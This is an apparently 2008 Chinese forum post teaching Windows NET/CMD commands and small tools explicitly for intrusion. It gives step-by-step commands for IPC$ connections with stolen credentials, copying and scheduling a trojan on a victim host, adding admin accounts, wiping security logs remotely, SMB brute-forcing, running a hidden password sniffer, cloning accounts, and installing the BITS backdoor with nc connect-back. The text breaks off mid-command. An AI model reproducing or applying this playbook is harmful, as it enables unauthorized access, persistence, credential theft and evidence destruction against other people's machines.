功能强大的NET命令

功能强大的NET命令：一些常用的Net命令与例子：（1）建立IPC连接的命令Netuse\\IP\ipc$“”/user:username例如：Netuse\\127.0.0.1\ipc$123456/user:administrator这个命令的意思就是与用户名为adminidtrator用户密码为123456的主机127.0.0.1建立ipc$空连接(2)删除IPC$空连接Netuse\\ip/del例如：Netuse\\127.0.0.1/del删除与主机127.0.0.1已经建立的Ipc$连接(3)启动关闭服务：Netstart//查看已经开启的服务NetstartservernameNetstopservername例如：Netstarttelnet//开启telnet服务Netstoptelnet//关闭telnet服务(4)启动关闭共享Netshateipc$//开启ipc$默认共享Netshareipc$/del//关闭ipc$默认共享Netsharec=c:\//完全共享c盘Netshared=d:\//删除完全共享的d盘(4)映射硬盘Netusez:\\ip\c$例如：Netusez:\\127.0.0.1\c$//把127.0.0.1的C盘映射成本机的z盘说明：映射成功后，你在我的电脑里面里面就会多出一个硬盘Z，其实Z就是127.0.0.1的C盘！Netusez:/del//断开映射入侵中的作用：把对方的硬盘映射过来以后我们就能直接复制文件到对方的硬盘下面了成功实现的条件：必须与对方建立ipc$连接(5)远程复制文件_CopyCopye:\3389.exe\\127.0.0.1\c$\\将本地的E盘下的3389.exe这个文件copy到对方系统的C盘根目录下Copy在入侵中的作用：把本地文件复制到对方硬盘Copy复制成功所需的条件：必须与主机建立ipc$连接(6)查看远程系统的时间Nettime\\IPNettime\\127.0.0.1//查看远程主机127.0.0.1的本地时间作用：得到对方时间好为自己计划任务种下木马做准备(7)远程运行程序At\\iptimeserver.exeAt\\127.0.0.112:30c:\server.exe\\让主机在中午12:30分运行我们已经复制到他C盘根目录下的木马server.exe在入侵中作用：这样我们就可以用我们的木马服务端来连接我们木马，，更好的使用图形方式来控制肉鸡.(推荐使用神气儿^_^)（8）添加管理员帐号：Netuserjuntuan1234/add\\添加一个密码为1234名字为军团的用户Netlocalgroupadministratorsjuntuan/add\\把juntuan这个用户添加到管理员组注意：有些系统的管理员组不是administrators你要根据实际情况来改，不过99.9%的系统的管理员组还是administrators的。修改用户密码：Netuserjuntuan1234\\把用户juntuan的密码修改成1233。（9）远程登陆主机_telnettelnetIPport例如：telnet127.0.0.11234//连接登陆127.0.0.1的1234端口（当目标主机的端口是默认的23的时候我们不需要+端口即：telnetIP就好）（10）传输文件命令_ftp其实这个我个人觉得用途不大，毕竟当你拿到了FTP密码之后你可以用flashftp或者cutftp有一个图形截面的交互如何不好呢？首先在CMD里面输入ftp然后输入：openIPport例如：open127.0.0.11234//连接登陆127.0.0.1的1234端口如何开启windows系统自带的ftp服务：Netstartmsftppsvc(11)查看文件夹的属性_caclsCaclsxiaod//查看xiaod这个文件夹的属性参数说明：F：（完全控制）R：（只读）C：（允许更改）W：（允许写入）N：（没有任何权限）(12)删除文件_delDel是用来删除文件命令首先进入你想删除的文件的目录Delxiaod.txt//删除xiaod.txt这个个文件Delxiaod.txt/f//强制删除xiaod.txt这个个文件（当该文件无法正常删除的时候使用该命令）(13)finger命令Finger是一个信息刺探命令一般在对方开启了79端口时命令使用Finger–luser@computer参数详解：-l用长列表格式显示消息2008-11-2911:01回复新刘诺8位粉丝2楼User:指定用户的信息成功实现的条件：对方必须安装tcp/ip协议(14)：文件写入命令_echo:Echo你好index.htm//用你好来覆盖index.htm的内容Echo你好index.htm//将“你好”添加到index.htm（15）：写入注册表文件_regeditRegedit/sfilename.reg//s是写入参数(16)：端口映射_chgportChgport3=5//将端口3映射到5Chgport/d*//删除所有端口映射(17)：文件映射_substSubstb:\c:\winnt\\这个时候当你访问硬盘B的时候你就是访问了c:\winnt目录(18)：查看当前正在使用的帐号：Querysession//查看帐号(19)：踢掉指定用：Logoffid//注意ID，是在用querysession查看到的用户的id而不是用户名。(20)：发送消息给某用户或者内网主机Netsendhostnameor/IPmessage例如：netsendxiaodor/127.0.0.1hello!CMD的内部基本入侵命令讲解完毕，现在我们来讲讲他的外部命令，也就是借用外部DOS小工具的方法：（二）CMD外部一部分小工具的使用方法：(1)opentelnet：一个在得到对方用户名与密码的情况下远程开启对方telnet的程序命令语法：opentelnet\\IPusernamepassntmlport例子：opentelnet\\127.0.0.1administrator123413800开启主机127.0.0.1的telnet服务，并且端口设置在3800（当连接的时候就需要telnet127.0.0.13800了）1是NTML的验证值，就是说，我们需要输入登陆用户名与密码才能登陆。该命令成功实现的条件：对方没有装防火墙，并且IPC$服务开启telnet.vbe：一个不基于IPC$是否开启直接开telnet的工具命令语法：cscripttelnet.vbe127.0.0.1usernamepassntmlport这个与上面哪个opentelnet的使用含义是一样的该命令成功实现的条件：对方没有装防火墙（2）Pslist：查看系统进程的工具Pskill：杀除系统进程的工具进入工具目录直接输入：pslist即可以查看系统进程如下图：图中用红色标注的就是PID列表：Pskillpid如下图片：显然1560是conime的进程，已经被杀了。（3）fport：一个查看系统程序所对应的端口的工具使用方法如下图：(4)：远程删除日志：Cleanlog.vbe命令语法：Cscriptcleanlog.vbeIPusernamepasssystem–all//删除系统日志Cscriptcleanlog.vbeIPusernamepassapplication–all//删除应用程序日志Cscriptcleanlog.vbeIPusernamepasssecutity–all//删除安全日志使用的优势：无须对方开启ipc$共享(5)：远程开启关闭重启主机：Reboot.vbeCscriptReboot.vbeIPusernamepass–r//重启目标主机CscriptReboot.vbeIPusernamepass–s//关闭目标主机CscriptReboot.vbeIPusernamepass–I//注销目标当前用户CscriptReboot.vbeIPusernamepass–p//关闭目标电源使用的优势：无须对方开启ipc$共享(6)：端口重定rinetdandfpipe首先说说rinetd的使用首先我们配置一个文件juntuan.txtjuntuan.txt内容如下：IP121IP23389//释：IP1是主机IPIP2是要接受的内网主机IP，既整个命令的意思是当你连接IP1主机（公网IP）的21端口的时候，主机一（IP1）会把他21端口接收到数据发到内网主机（IP2）的3389。也就是你连接IP1主机的21端口，实际上就是连接IP2的3389端口。命令：rinetd.exe–cjuntuan.txt工具2：fpipe使用命令：fpipe–v–l53s53–r23主机IP例子：fpipe–l80–s90–r80127.0.0.1释：将本机的80端口接收到的数据通过本机的90端口直接转发到127.0.0.1的80端口(7)：SNMP弱口令的利用：工具：SnmputilSnmputil[get|getnext|walk]agentid//语法格式2008-11-2911:01回复新刘诺8位粉丝3楼Snmputilwalk127.0.0.1xiaod.1.3.6.1.4.1.77.1.2.25.1.5\\查询帐户Snmputilwalk对方IPpublic.1.3.6.1.2.1.25.4.2.1.2\\查询系统进程Snmputilwalk对方IPpublic.1.3.6.1.4.1.77.1.2.25.1.1\\查询用户列表Snmputilwalk对方IPpublic.1.3.6.1.2.1.1\\列出对方系统信息该工具的作用：查询一部分系统而已我个人这个没有很大的作用，查看到了系统信息，要攻破还是需要运气(8)：暴力破解系统密码SmbcrackSmbcrackIPusername字典路径端口释：首先你需要用字典自己做一个字典，用户名建议是administrator因为这个是系统默认的管理员估计大多数人的主机这个帐号还是存在的，端口可以是139、137、445系统开启的NETBOIS协议端口就可以！(9)：小巧的嗅叹器_xsniffXsniff是一个小巧的嗅叹器，可以嗅叹UDP/TCP协议的信息使用语法：Xsniff–pass–hide–logc:\pass.log–passc:\pass.log是保存记录文件，建议选择一个深的目录，可以自定义性能参数：-hide隐藏在后台运行-log：生成嗅叹的日志文档Pass.log:嗅叹的日志文档文档名，可以自定义-TCP：捕获TCP数据包-UDP：捕获UDP数据包-ICMP：捕获ICMP数据包-HOST：主机名或IP地址-PORT：指定端口嗅叹-ASC输出出时保存为ASCII格式(10)：SFIND命令行扫描器例子：Sfind–p3389192.168.10.1192.168.10.255扫描192.168.10.1段的1-255主机的3389端口Sfind–cgi192.168.10.1//扫描192.168.10.1的cgi漏洞Sfind–ftp192.168.10.1//扫描192.168.10.1的ftp漏洞Sfind–idq192.168.10.1//扫描192.168.10.1的idg漏洞(11)：克隆帐号CA：CA.EXE\\IPadministrator“”guest123将GUEST帐号克隆成管理员Administrator的密码为空用””guest的密码是123(12)：后门使用：这里我介绍小榕的bits说明：BITS必须放在system32目录下才可以安装安装命令：rundll32.exeBITS.dllinstallrasatojuntuan//指定后门特征为juntuan连接激活：正向连接（用nc连接即可）：juntuan:@IP[xell]:99反向连接:juntuan:@IP[rxe